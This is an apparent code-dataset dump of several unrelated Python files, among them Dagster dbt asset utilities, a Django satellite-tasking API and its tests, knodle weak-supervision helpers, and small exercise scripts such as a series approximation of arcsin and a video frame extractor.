default_metadata_from_dbt_resource_props(\n dbt_resource_props: Mapping[str, Any]\n) -> Mapping[str, Any]:\n metadata: Dict[str, Any] = {}\n columns = dbt_resource_props.get(\"columns\", {})\n if len(columns) > 0:\n metadata[\"table_schema\"] = MetadataValue.table_schema(\n TableSchema(\n columns=[\n TableColumn(\n name=column_name,\n type=column_info.get(\"data_type\") or \"?\",\n description=column_info.get(\"description\"),\n )\n for column_name, column_info in columns.items()\n ]\n )\n )\n return metadata\n\n\ndef default_group_from_dbt_resource_props(dbt_resource_props: Mapping[str, Any]) -> Optional[str]:\n \"\"\"Get the group name for a dbt node.\n\n If a Dagster group is configured in the metadata for the node, use that.\n\n Otherwise, if a dbt group is configured for the node, use that.\n \"\"\"\n dagster_metadata = dbt_resource_props.get(\"meta\", {}).get(\"dagster\", {})\n\n dagster_group = dagster_metadata.get(\"group\")\n if dagster_group:\n return dagster_group\n\n dbt_group = dbt_resource_props.get(\"config\", {}).get(\"group\")\n if dbt_group:\n return dbt_group\n\n return None\n\n\ndef group_from_dbt_resource_props_fallback_to_directory(\n dbt_resource_props: Mapping[str, Any]\n) -> Optional[str]:\n \"\"\"Get the group name for a dbt node.\n\n Has the same behavior as the default_group_from_dbt_resource_props, except for that, if no group can be determined\n from config or metadata, falls back to using the subdirectory of the models directory that the\n source file is in.\n\n Args:\n dbt_resource_props (Mapping[str, Any]): A dictionary representing the dbt resource.\n\n Examples:\n .. 
code-block:: python\n\n from dagster_dbt import group_from_dbt_resource_props_fallback_to_directory\n\n dbt_assets = load_assets_from_dbt_manifest(\n manifest=manifest,\n node_info_to_group_fn=group_from_dbt_resource_props_fallback_to_directory,\n )\n \"\"\"\n group_name = default_group_from_dbt_resource_props(dbt_resource_props)\n if group_name is not None:\n return group_name\n\n fqn = dbt_resource_props.get(\"fqn\", [])\n # the first component is the package name, and the last component is the model name\n if len(fqn) < 3:\n return None\n return fqn[1]\n\n\ndef default_freshness_policy_fn(dbt_resource_props: Mapping[str, Any]) -> Optional[FreshnessPolicy]:\n dagster_metadata = dbt_resource_props.get(\"meta\", {}).get(\"dagster\", {})\n freshness_policy_config = dagster_metadata.get(\"freshness_policy\", {})\n\n freshness_policy = _legacy_freshness_policy_fn(freshness_policy_config)\n if freshness_policy:\n return freshness_policy\n\n legacy_freshness_policy_config = dbt_resource_props[\"config\"].get(\n \"dagster_freshness_policy\", {}\n )\n legacy_freshness_policy = _legacy_freshness_policy_fn(legacy_freshness_policy_config)\n\n if legacy_freshness_policy:\n deprecation_warning(\n \"dagster_freshness_policy\",\n \"0.21.0\",\n \"Instead, configure a Dagster freshness policy on a dbt model using\"\n \" +meta.dagster.freshness_policy.\",\n )\n\n return legacy_freshness_policy\n\n\ndef _legacy_freshness_policy_fn(\n freshness_policy_config: Mapping[str, Any]\n) -> Optional[FreshnessPolicy]:\n if freshness_policy_config:\n return FreshnessPolicy(\n maximum_lag_minutes=float(freshness_policy_config[\"maximum_lag_minutes\"]),\n cron_schedule=freshness_policy_config.get(\"cron_schedule\"),\n cron_schedule_timezone=freshness_policy_config.get(\"cron_schedule_timezone\"),\n )\n return None\n\n\ndef default_auto_materialize_policy_fn(\n dbt_resource_props: Mapping[str, Any]\n) -> Optional[AutoMaterializePolicy]:\n dagster_metadata = dbt_resource_props.get(\"meta\", {}).get(\"dagster\", {})\n auto_materialize_policy_config = dagster_metadata.get(\"auto_materialize_policy\", {})\n\n auto_materialize_policy = _auto_materialize_policy_fn(auto_materialize_policy_config)\n if auto_materialize_policy:\n return auto_materialize_policy\n\n legacy_auto_materialize_policy_config = dbt_resource_props[\"config\"].get(\n \"dagster_auto_materialize_policy\", {}\n )\n legacy_auto_materialize_policy = _auto_materialize_policy_fn(\n legacy_auto_materialize_policy_config\n )\n\n if legacy_auto_materialize_policy:\n deprecation_warning(\n \"dagster_auto_materialize_policy\",\n \"0.21.0\",\n \"Instead, configure a Dagster auto-materialize policy on a dbt model using\"\n \" +meta.dagster.auto_materialize_policy.\",\n )\n\n return legacy_auto_materialize_policy\n\n\ndef _auto_materialize_policy_fn(\n auto_materialize_policy_config: Mapping[str, Any]\n) -> Optional[AutoMaterializePolicy]:\n if auto_materialize_policy_config.get(\"type\") == \"eager\":\n return AutoMaterializePolicy.eager()\n elif auto_materialize_policy_config.get(\"type\") == \"lazy\":\n return AutoMaterializePolicy.lazy()\n return None\n\n\ndef default_description_fn(dbt_resource_props: Mapping[str, Any], display_raw_sql: bool = True):\n code_block = textwrap.indent(\n dbt_resource_props.get(\"raw_sql\") or dbt_resource_props.get(\"raw_code\", \"\"), \" \"\n )\n description_sections = [\n dbt_resource_props[\"description\"]\n or f\"dbt {dbt_resource_props['resource_type']} {dbt_resource_props['name']}\",\n ]\n if display_raw_sql:\n 
description_sections.append(f\"#### Raw SQL:\\n```\\n{code_block}\\n```\")\n return \"\\n\\n\".join(filter(None, description_sections))\n\n\ndef is_generic_test_on_attached_node_from_dbt_resource_props(\n unique_id: str, dbt_resource_props: Mapping[str, Any]\n) -> bool:\n attached_node_unique_id = dbt_resource_props.get(\"attached_node\")\n is_generic_test = bool(attached_node_unique_id)\n\n return is_generic_test and attached_node_unique_id == unique_id\n\n\ndef default_asset_check_fn(\n asset_key: AssetKey,\n unique_id: str,\n dagster_dbt_translator_settings: \"DagsterDbtTranslatorSettings\",\n dbt_resource_props: Mapping[str, Any],\n) -> Optional[AssetCheckSpec]:\n is_generic_test_on_attached_node = is_generic_test_on_attached_node_from_dbt_resource_props(\n unique_id, dbt_resource_props\n )\n\n if not all(\n [\n dagster_dbt_translator_settings.enable_asset_checks,\n is_generic_test_on_attached_node,\n ]\n ):\n return None\n\n return AssetCheckSpec(\n name=dbt_resource_props[\"name\"],\n asset=asset_key,\n description=dbt_resource_props[\"description\"],\n )\n\n\ndef default_code_version_fn(dbt_resource_props: Mapping[str, Any]) -> str:\n return hashlib.sha1(\n (dbt_resource_props.get(\"raw_sql\") or dbt_resource_props.get(\"raw_code\", \"\")).encode(\n \"utf-8\"\n )\n ).hexdigest()\n\n\n###################\n# DEPENDENCIES\n###################\n\n\ndef is_non_asset_node(dbt_resource_props: Mapping[str, Any]):\n # some nodes exist inside the dbt graph but are not assets\n resource_type = dbt_resource_props[\"resource_type\"]\n if resource_type == \"metric\":\n return True\n if (\n resource_type == \"model\"\n and dbt_resource_props.get(\"config\", {}).get(\"materialized\") == \"ephemeral\"\n ):\n return True\n return False\n\n\ndef get_deps(\n dbt_nodes: Mapping[str, Any],\n selected_unique_ids: AbstractSet[str],\n asset_resource_types: List[str],\n) -> Mapping[str, FrozenSet[str]]:\n def _valid_parent_node(dbt_resource_props):\n # sources are valid parents, but not assets\n return dbt_resource_props[\"resource_type\"] in asset_resource_types + [\"source\"]\n\n asset_deps: Dict[str, Set[str]] = {}\n for unique_id in selected_unique_ids:\n dbt_resource_props = dbt_nodes[unique_id]\n node_resource_type = dbt_resource_props[\"resource_type\"]\n\n # skip non-assets, such as metrics, tests, and ephemeral models\n if is_non_asset_node(dbt_resource_props) or node_resource_type not in asset_resource_types:\n continue\n\n asset_deps[unique_id] = set()\n for parent_unique_id in dbt_resource_props.get(\"depends_on\", {}).get(\"nodes\", []):\n parent_node_info = dbt_nodes[parent_unique_id]\n # for metrics or ephemeral dbt models, BFS to find valid parents\n if is_non_asset_node(parent_node_info):\n visited = set()\n replaced_parent_ids = set()\n # make a copy to avoid mutating the actual dictionary\n queue = list(parent_node_info.get(\"depends_on\", {}).get(\"nodes\", []))\n while queue:\n candidate_parent_id = queue.pop()\n if candidate_parent_id in visited:\n continue\n visited.add(candidate_parent_id)\n\n candidate_parent_info = dbt_nodes[candidate_parent_id]\n if is_non_asset_node(candidate_parent_info):\n queue.extend(candidate_parent_info.get(\"depends_on\", {}).get(\"nodes\", []))\n elif _valid_parent_node(candidate_parent_info):\n replaced_parent_ids.add(candidate_parent_id)\n\n asset_deps[unique_id] |= replaced_parent_ids\n # ignore nodes which are not assets / sources\n elif _valid_parent_node(parent_node_info):\n asset_deps[unique_id].add(parent_unique_id)\n\n frozen_asset_deps = {\n 
unique_id: frozenset(parent_ids) for unique_id, parent_ids in asset_deps.items()\n }\n\n return frozen_asset_deps\n\n\ndef get_asset_deps(\n dbt_nodes,\n deps,\n io_manager_key,\n manifest: Optional[Mapping[str, Any]],\n dagster_dbt_translator: \"DagsterDbtTranslator\",\n) -> Tuple[\n Dict[AssetKey, Set[AssetKey]],\n Dict[AssetKey, Tuple[str, In]],\n Dict[AssetKey, Tuple[str, Out]],\n Dict[AssetKey, str],\n Dict[AssetKey, FreshnessPolicy],\n Dict[AssetKey, AutoMaterializePolicy],\n Dict[str, AssetCheckSpec],\n Dict[str, List[str]],\n Dict[str, Dict[str, Any]],\n]:\n from .dagster_dbt_translator import DbtManifestWrapper, validate_translator\n\n dagster_dbt_translator = validate_translator(dagster_dbt_translator)\n\n asset_deps: Dict[AssetKey, Set[AssetKey]] = {}\n asset_ins: Dict[AssetKey, Tuple[str, In]] = {}\n asset_outs: Dict[AssetKey, Tuple[str, Out]] = {}\n\n # These dicts could be refactored as a single dict, mapping from output name to arbitrary\n # metadata that we need to store for reference.\n group_names_by_key: Dict[AssetKey, str] = {}\n freshness_policies_by_key: Dict[AssetKey, FreshnessPolicy] = {}\n auto_materialize_policies_by_key: Dict[AssetKey, AutoMaterializePolicy] = {}\n check_specs: List[AssetCheckSpec] = []\n fqns_by_output_name: Dict[str, List[str]] = {}\n metadata_by_output_name: Dict[str, Dict[str, Any]] = {}\n\n for unique_id, parent_unique_ids in deps.items():\n dbt_resource_props = dbt_nodes[unique_id]\n\n output_name = output_name_fn(dbt_resource_props)\n fqns_by_output_name[output_name] = dbt_resource_props[\"fqn\"]\n\n metadata_by_output_name[output_name] = {\n key: dbt_resource_props[key] for key in [\"unique_id\", \"resource_type\"]\n }\n\n asset_key = dagster_dbt_translator.get_asset_key(dbt_resource_props)\n\n asset_deps[asset_key] = set()\n\n metadata = merge_dicts(\n dagster_dbt_translator.get_metadata(dbt_resource_props),\n {\n MANIFEST_METADATA_KEY: DbtManifestWrapper(manifest=manifest) if manifest else None,\n DAGSTER_DBT_TRANSLATOR_METADATA_KEY: dagster_dbt_translator,\n },\n )\n asset_outs[asset_key] = (\n output_name,\n Out(\n io_manager_key=io_manager_key,\n description=dagster_dbt_translator.get_description(dbt_resource_props),\n metadata=metadata,\n is_required=False,\n dagster_type=Nothing,\n code_version=default_code_version_fn(dbt_resource_props),\n ),\n )\n\n group_name = dagster_dbt_translator.get_group_name(dbt_resource_props)\n if group_name is not None:\n group_names_by_key[asset_key] = group_name\n\n freshness_policy = dagster_dbt_translator.get_freshness_policy(dbt_resource_props)\n if freshness_policy is not None:\n freshness_policies_by_key[asset_key] = freshness_policy\n\n auto_materialize_policy = dagster_dbt_translator.get_auto_materialize_policy(\n dbt_resource_props\n )\n if auto_materialize_policy is not None:\n auto_materialize_policies_by_key[asset_key] = auto_materialize_policy\n\n test_unique_ids = []\n if manifest:\n test_unique_ids = [\n child_unique_id\n for child_unique_id in manifest[\"child_map\"][unique_id]\n if child_unique_id.startswith(\"test\")\n ]\n\n for test_unique_id in test_unique_ids:\n test_resource_props = manifest[\"nodes\"][test_unique_id]\n check_spec = default_asset_check_fn(\n asset_key, unique_id, dagster_dbt_translator.settings, test_resource_props\n )\n\n if check_spec:\n check_specs.append(check_spec)\n\n for parent_unique_id in parent_unique_ids:\n parent_node_info = dbt_nodes[parent_unique_id]\n parent_asset_key = dagster_dbt_translator.get_asset_key(parent_node_info)\n\n 
asset_deps[asset_key].add(parent_asset_key)\n\n            # if this parent is not one of the selected nodes, it's an input\n            if parent_unique_id not in deps:\n                input_name = input_name_fn(parent_node_info)\n                asset_ins[parent_asset_key] = (input_name, In(Nothing))\n\n    check_specs_by_output_name = cast(\n        Dict[str, AssetCheckSpec],\n        _validate_and_assign_output_names_to_check_specs(check_specs, list(asset_outs.keys())),\n    )\n\n    return (\n        asset_deps,\n        asset_ins,\n        asset_outs,\n        group_names_by_key,\n        freshness_policies_by_key,\n        auto_materialize_policies_by_key,\n        check_specs_by_output_name,\n        fqns_by_output_name,\n        metadata_by_output_name,\n    )\n\n\ndef has_self_dependency(dbt_resource_props: Mapping[str, Any]) -> bool:\n    dagster_metadata = dbt_resource_props.get(\"meta\", {}).get(\"dagster\", {})\n    has_self_dependency = dagster_metadata.get(\"has_self_dependency\", False)\n\n    return has_self_dependency\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-dbt/dagster_dbt/asset_utils.py","file_name":"asset_utils.py","file_ext":"py","file_size_in_byte":27044,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"22398705923","text":"import sys\ninput = sys.stdin.readline\n\nnums = input().rstrip()\nnums = [int(n) for n in nums]\n\nordered_nums = sorted(nums, reverse=True)\n\nfor n in ordered_nums: \n    print(n, end = '')","repo_name":"parksangmyeong1/Algorithm","sub_path":"Python/문자열/[BOJ]소트인사이드.py","file_name":"[BOJ]소트인사이드.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1397332585","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom .models import Satellite, Task\nfrom earth_api import serializers\nfrom earth_api.distributor import start_distribution, get_online_satellites\n\n\nclass RegisterSatellite(APIView):\n    \"\"\"port is Satellite's PK, so if someone tries to save an already saved satellite, nothing will happen.\n    There's no need to check for an existing record first. In a way, that makes the GET method unnecessary. \n    I'll keep it nonetheless. 
It could still be handy to know whether a satellite is stored in the db or not.\n    \"\"\"\n\n    serializer_class = serializers.RegisterSatelliteSerializer\n\n    def get(self, request, format=None):\n        port_number = request.query_params.get('port', None)\n        host = request.query_params.get('host', None)\n\n        if not port_number:\n            return Response({'port': 'Missing parameter'}, status=status.HTTP_400_BAD_REQUEST)\n        if not host:\n            return Response({'host': 'Missing parameter'}, status=status.HTTP_400_BAD_REQUEST)\n\n        try:\n            Satellite.objects.get(host=host, port=port_number)\n            message = 'Found'\n        except Satellite.DoesNotExist:\n            return Response({'error': 'Satellite does not exist'},\n                            status=status.HTTP_404_NOT_FOUND)\n        return Response({'message': message})\n\n    def post(self, request):\n        data = request.data.copy()\n        serializer = self.serializer_class(data=data)\n\n        if serializer.is_valid():\n            serializer.save()\n            return Response(serializer.data)\n        else:\n            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass TaskResults(APIView):\n    \"\"\"Used to get the results of the assigned tasks from the satellites.\n    Because in this exercise the processing time is almost non-existent, we can \n    instead obtain this data from the response to the get method of the Tasks \n    view in satellites_app.satellites_api.views.TasksView\n    \"\"\"\n    serializer_class = serializers.TaskResultsSerializer\n\n    def post(self, request):\n\n        serializers = self.serializer_class(data=request.data)\n        \n        if serializers.is_valid():\n            name = serializers.validated_data.get('name')\n            date_added = serializers.validated_data.get('date_added')\n            assigned_to = serializers.validated_data.get('assigned_to')\n            completed = serializers.validated_data.get('completed')\n            try:\n                Task(\n                    name=name,\n                    date_added=date_added,\n                    assigned_to=assigned_to,\n                    completed=completed\n                ).save()\n            except Exception as e:\n                return Response({'message': str(e)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n            return Response({'message': 'Task saved.'})\n        else:\n            return Response(serializers.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass OnlineSatellites(APIView):\n    def get(self, request, format=None):\n        online_satellites = get_online_satellites()\n        serializer = serializers.RegisterSatelliteSerializer(online_satellites, many=True)\n        return Response(serializer.data)\n\n\nclass StartButton(APIView):\n\n    serializer_class = serializers.StartButtonSerializer\n\n    def get(self, request, format=None):\n        return Response({'example': DEMO})\n\n    def post(self, request):\n\n        serializers = self.serializer_class(data=request.data)\n\n        if serializers.is_valid():\n            tasks = serializers.validated_data.get('tasks')\n            result = start_distribution(tasks)\n            return Response({'message': result}) \n        else:\n            return Response(serializers.errors, status=status.HTTP_400_BAD_REQUEST) \n\n\nDEMO = {\n    \"tasks\": [{\n        \"name\": \"fotos\",\n        \"pay_off\": 10,\n        \"resources\": [1, 5]\n    },\n    {\n        \"name\": \"mantenimiento\",\n        \"pay_off\": 1,\n        \"resources\": [1, 2]\n    },\n    {\n        \"name\": \"pruebas\",\n        \"pay_off\": 1,\n        \"resources\": [5, 6]\n    },\n    {\n        \"name\": \"fsck\",\n        \"pay_off\": 0.1,\n        \"resources\": [1, 6]\n    }]\n}\n","repo_name":"TomCastagnino/satellites","sub_path":"ground/earth_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"567330454","text":"from rest_framework.test import APITestCase\nfrom rest_framework import status\nfrom django.contrib.auth.models 
import User\nfrom django.utils.crypto import get_random_string\nfrom rest_framework.authtoken.models import Token\nfrom community.views import Community, CommunitySerializer\n\n# Create your tests here.\n\n\nclass TestCommunityView(APITestCase):\n\n def setUp(self) -> None:\n self.url = \"/community\"\n self.user = User.objects.create_superuser(username=\"discord\")\n self.token = Token.objects.create(user=self.user)\n self.client.credentials(HTTP_AUTHORIZATION=f\"Token {self.token.key}\")\n self.community = Community.objects.create(\n platform=self.user, community_id=get_random_string(20))\n\n def test_get(self) -> None:\n response = self.client.get(\n f\"{self.url}?id={self.community.community_id}\", format=\"json\")\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(\n response.json(), CommunitySerializer(self.community).data)\n\n def test_post(self) -> None:\n community_id = get_random_string(20)\n response = self.client.post(\n self.url, data={\"communityID\": community_id}, format=\"json\")\n community = Community.objects.get(\n platform=self.user, community_id=community_id)\n\n self.assertEqual(response.json().get(\"platform\"), self.user.id)\n self.assertEqual(community.platform.id, self.user.id)\n self.assertEqual(response.json().get(\"community_id\"), community_id)\n self.assertEqual(community.community_id, community_id)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n def test_put(self) -> None:\n self.assertEqual(self.community.discord_log_channel, Community._meta.get_field(\n \"discord_log_channel\").get_default())\n self.assertEqual(self.community.discord_notify_target, Community._meta.get_field(\n \"discord_notify_target\").get_default())\n discord_log_channel = get_random_string(20)\n discord_notify_target = get_random_string(20)\n\n response = self.client.put(self.url, data={\n \"communityID\": self.community.community_id,\n \"discord_log_channel\": discord_log_channel,\n \"discord_notify_target\": discord_notify_target\n }, format=\"json\")\n\n self.community = Community.objects.get(\n community_id=self.community.community_id)\n\n self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)\n self.assertEqual(self.community.discord_log_channel,\n discord_log_channel)\n self.assertEqual(self.community.discord_notify_target,\n discord_notify_target)\n\n def test_delete(self) -> None:\n community_id = self.community.community_id\n response = self.client.delete(\n f\"{self.url}?id={self.community.community_id}\", format=\"json\")\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n with self.assertRaises(Community.DoesNotExist):\n Community.objects.get(platform=self.user,\n community_id=community_id)\n","repo_name":"dragonejt/sibyl","sub_path":"community/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75328590248","text":"import logging\nimport random\nfrom typing import Dict\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import TensorDataset\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_labels_randomly(\n rule_matches_z: np.ndarray, rule_assignments_t: np.ndarray\n) -> np.ndarray:\n \"\"\" Calculates sample labels basing on z and t matrices. 
If several patterns matched, select one randomly \"\"\"\n\n    if rule_matches_z.shape[1] != rule_assignments_t.shape[0]:\n        raise ValueError(\"Dimensions mismatch!\")\n\n    one_hot_labels = rule_matches_z.dot(rule_assignments_t)\n    one_hot_labels[one_hot_labels > 0] = 1\n    labels = [np.random.choice(np.where(r == 1)[0], 1)[0] for r in one_hot_labels]\n    return np.stack(labels, axis=0)\n\n\ndef vocab_and_vectors(filename: str, special_tokens: list) -> (dict, np.ndarray):\n    \"\"\"special tokens have all-zero word vectors\"\"\"\n    with open(filename, encoding=\"UTF-8\") as in_file:\n        parts = in_file.readline().strip().split(\" \")\n        num_vecs = int(parts[0]) + len(special_tokens)  # + 1\n        dim = int(parts[1])\n\n        matrix = np.zeros((num_vecs, dim))\n        word_to_id = dict()\n\n        nextword_id = 0\n        for token in special_tokens:\n            word_to_id[token] = nextword_id\n            nextword_id += 1\n\n        for line in in_file:\n            parts = line.strip().split(\" \")\n            word = parts[0]\n            if word not in word_to_id:\n                emb = [float(v) for v in parts[1:]]\n                matrix[nextword_id] = emb\n                word_to_id[word] = nextword_id\n                nextword_id += 1\n    return word_to_id, matrix\n\n\ndef get_embedding_matrix(pretrained_embedding_file: str) -> np.ndarray:\n    \"\"\" Return matrix with pretrained glove embeddings\"\"\"\n    with open(pretrained_embedding_file, encoding=\"UTF-8\") as in_file:\n        emb_matrix_size = in_file.readline().strip().split(\" \")\n        embeddings = []\n        for line in in_file:\n            parts = line.strip().split(\" \")\n            embeddings.append([float(v) for v in parts[1:]])\n        emb_matrix = np.array(embeddings)\n        assert emb_matrix.shape[0] == int(emb_matrix_size[0]) and emb_matrix.shape[\n            1\n        ] == int(emb_matrix_size[1])\n    return emb_matrix\n\n\ndef set_device(enable_cuda: bool):\n    \"\"\" Set where the calculations will be done (cpu or cuda) depending on whether the cuda is available and chosen \"\"\"\n    if enable_cuda and torch.cuda.is_available():\n        logger.info(\"Using GPU\")\n        return torch.device(\"cuda\")\n    else:\n        logger.info(\"Using CPU\")\n        return torch.device(\"cpu\")\n\n\n# deprecated\ndef check_splitting(\n    tst_samples: TensorDataset,\n    tst_labels: np.ndarray,\n    tst_idx: np.ndarray,\n    samples: torch.Tensor,\n    labels: np.ndarray,\n) -> None:\n    \"\"\" Custom function to check that the splitting into train and test sets for WSCrossWeigh was done correctly\"\"\"\n\n    rnd_tst = np.random.randint(0, tst_samples.tensors[0].shape[0])  # take some random index\n    tst_sample = tst_samples.tensors[0][rnd_tst, :]\n    tst_idx = tst_idx[rnd_tst]\n\n    tst_label = tst_labels[rnd_tst, :] if len(tst_labels.shape) > 1 else tst_labels[rnd_tst]\n    tst_label_true = labels[tst_idx, :] if len(labels.shape) > 1 else labels[tst_idx]\n\n    if not torch.equal(tst_sample, samples[tst_idx, :]):\n        raise RuntimeError(\n            \"The splitting of original training set into cw train and test sets has been done \"\n            \"incorrectly! A sample does not correspond to one in the original dataset\"\n        )\n\n    if not np.array_equal(tst_label, tst_label_true):\n        raise RuntimeError(\n            \"The splitting of original training set into cw train and test sets has been done \"\n            \"incorrectly! 
A sample label does not correspond to one in the original dataset\"\n        )\n\n\ndef return_unique(where_to_find: np.ndarray, what_to_find: np.ndarray) -> np.ndarray:\n    \"\"\" Checks intersections between the 1st and the 2nd arrays and return unique values of the 1st array \"\"\"\n    intersections = np.intersect1d(where_to_find, what_to_find, return_indices=True)[1].tolist()\n    return np.delete(where_to_find, intersections)\n","repo_name":"knodle/knodle","sub_path":"knodle/trainer/wscrossweigh/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"44182404032","text":"'''\r\nFor27. Given a real number X (|X| < 1) and an integer N (> 0). Find\r\nthe value of the expression\r\nX + 1·X^3/(2·3) + 1·3·X^5/(2·4·5) + ... +\r\n+ 1·3·...·(2·N−1)·X^(2·N+1)/(2·4·...·(2·N)·(2·N+1)).\r\nThe resulting number is an approximate value of the arcsin function\r\nat the point X.\r\n'''\r\nX = float(input(\"Enter X \"))\r\n\r\nwhile abs(X) > 1:\r\n\tX = float(input(\"Enter X \"))\r\n\r\nN = int(input(\"Enter N \"))\r\n\r\nwhile N <= 0:\r\n\tN = int(input(\"Enter N \"))\r\n\r\nsumm = X\r\nchislitel = 1\r\nznamenatel = 1\r\n\r\nfor i in range(1,N+1):\r\n\tchislitel = chislitel * (2 * i - 1)\r\n\tznamenatel = znamenatel * (2 * i)\r\n\tsumm += chislitel * pow(X, (2*i+1)) / (znamenatel * (2 * i + 1))\r\n\t\r\nprint('=')\r\nprint(summ)\r\n\t\r\n\r\n","repo_name":"666sempron999/Abramyan-tasks-","sub_path":"For(40)/27.py","file_name":"27.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35221134402","text":"import json\nimport difflib\nfrom difflib import SequenceMatcher\nfrom difflib import get_close_matches\n\n# with open('data.json') as f:\n#     data = json.load(f)\n\n# opening and loading the data\ndata = json.load(open('data.json'))\n\n# asking user for input\nword = input('Enter word: ') \n\n# defining function that returns definition of word if exists\ndef translate(word):\n    word = word.lower()\n    wierd_w = get_close_matches(word, data.keys())\n    ranked_weird = []\n    concepts = []\n\n    # appending rank of the matches into a list\n    for x in wierd_w:\n        ranked_weird.append(round(SequenceMatcher(None,word, x).ratio(),2))\n    \n    while True:\n        if word in data.keys():\n            [concepts.append(x) for x in data[word]]\n\n            print('')\n            print('Your word has', len(data[word]), 'concepts. Do you want to see them all or just the first?')\n            sel_concepts = input('Reply \"one\", else all concepts will be shown: ')\n            print('')\n\n            if sel_concepts == 'one':\n                return print('Concept: ',concepts[0])\n            else:\n                for x in range(len(data[word])):\n                    print('Concept ',x+1,':', concepts[x])\n                print('')\n                break\n\n        else:\n            print('')\n            if len(wierd_w) == 0:\n                return \"We didn't find a decent match, try another word\"\n            \n            else:\n                print('We found a good match for your word.')\n                print(wierd_w)\n                print('% of the matching words: ', ranked_weird)\n                print('')\n\n                print('Is your word in this list? If so select a number in the range 1 -', len(wierd_w), '. 
Else type \"no\"')\n fixed_word = input()\n\n if fixed_word.isdigit() is True:\n fixed_word = int(fixed_word) - 1\n\n if len(wierd_w) >= fixed_word + 1:\n return print(wierd_w[fixed_word], ':', data[wierd_w[fixed_word]])\n\n elif len(wierd_w) < fixed_word + 1:\n print ('Number out of range')\n\n else:\n return 'Didnt type any number'\n\n elif fixed_word.lower() == 'no':\n return 'Try a different word'\n\n else:\n print('Type a correct number')\n\n\nprint(translate(word))\n# one thing that can be improved is implementing the same distribution of the concepts (in case there's more than one) when the program doesn't find the word in the keys.","repo_name":"CommanderPoe/project-various","sub_path":"01- Interactive Dict/int-dict.py","file_name":"int-dict.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44096488058","text":"import cv2\n\n# 비디오 파일 경로\nvideo_path = \"video0.mp4\"\n\n# 비디오 캡처 객체 생성\ncap = cv2.VideoCapture(video_path)\n\n# 저장할 이미지 파일의 경로 및 이름 설정\nimage_path = \"frames/frame_{}.jpg\" # 이미지 파일의 경로와 이름 패턴\nframe_count = 0 # 프레임 번호 초기화\n\n# 일정 시간 간격 설정 (여기서는 1초마다)\ntime_interval = 1 # 1초 (단위: 초)\n\n# 비디오 프레임 가져오기\nwhile cap.isOpened():\n # 비디오 프레임 읽기\n ret, frame = cap.read()\n\n if ret:\n # 일정 시간 간격마다 프레임 저장\n if frame_count % (time_interval * cap.get(cv2.CAP_PROP_FPS)) == 0:\n # 이미지 파일 경로 생성\n image_file = image_path.format(frame_count)\n\n # 프레임을 이미지로 저장\n cv2.imwrite(image_file, frame)\n print(f\"프레임 {frame_count} 저장 완료.\")\n\n frame_count += 1\n else:\n break\n\n# 자원 해제\ncap.release()\n","repo_name":"Mkpong/License_Plate_Recognition","sub_path":"CNNModel/videotest.py","file_name":"videotest.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21891614022","text":"from sklearn import svm\nimport numpy as np\n\nX = [[0,1,3,2,5], [1,2,5,6,2]]\ny = [0, 1]\n# np.reshape(X,(-1,1))\n# print(X)\nclf = svm.SVC()\nclf.fit(X, y)\nprint(clf.predict([[1,2,4,5,1]]))","repo_name":"AnupKumarJha/ML_algorithm","sub_path":"Part 3 - Classification/Section 17 - Kernel SVM/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"584508688","text":"\"\"\"\nThis package is part of our framework's CORE, which is meant to give flexible support for schedulers from different\nlibraries and frameworks via common abstract wrapper, currently it has support for:\n- pytorch\n\nLearning rate schedulers are functions which adjust current learning rate based on epoch count.\n\"\"\"\n__all__ = [\"get_sheduler_adapter\", \"Scheduler\"]\n\n#\nimport os\nimport importlib\n\n#\nimport torch.nn as nn\n\n#\nfrom innofw.core.schedulers.base import BaseSchedulerAdapter\nfrom innofw.core.optimizers import Optimizer\n\n\ndef factory_method(name):\n return __SCHEDULER_ADAP_DICT__[name]\n\n\n__SCHEDULER_ADAP_DICT__ = dict()\n\n\ndef get_sheduler_adapter(scheduler, optimizer, *args, **kwargs):\n suitable_schedulers = [\n scheduler_adapter\n for scheduler_adapter in __SCHEDULER_ADAP_DICT__.values()\n if scheduler_adapter.is_suitable_input(scheduler)\n ]\n if len(suitable_schedulers) == 0:\n raise NotImplementedError()\n elif len(suitable_schedulers):\n return suitable_schedulers[0](scheduler, optimizer, *args, **kwargs)\n\n\ndef register_scheduler_adapter(name):\n def register_function_fn(cls):\n if 
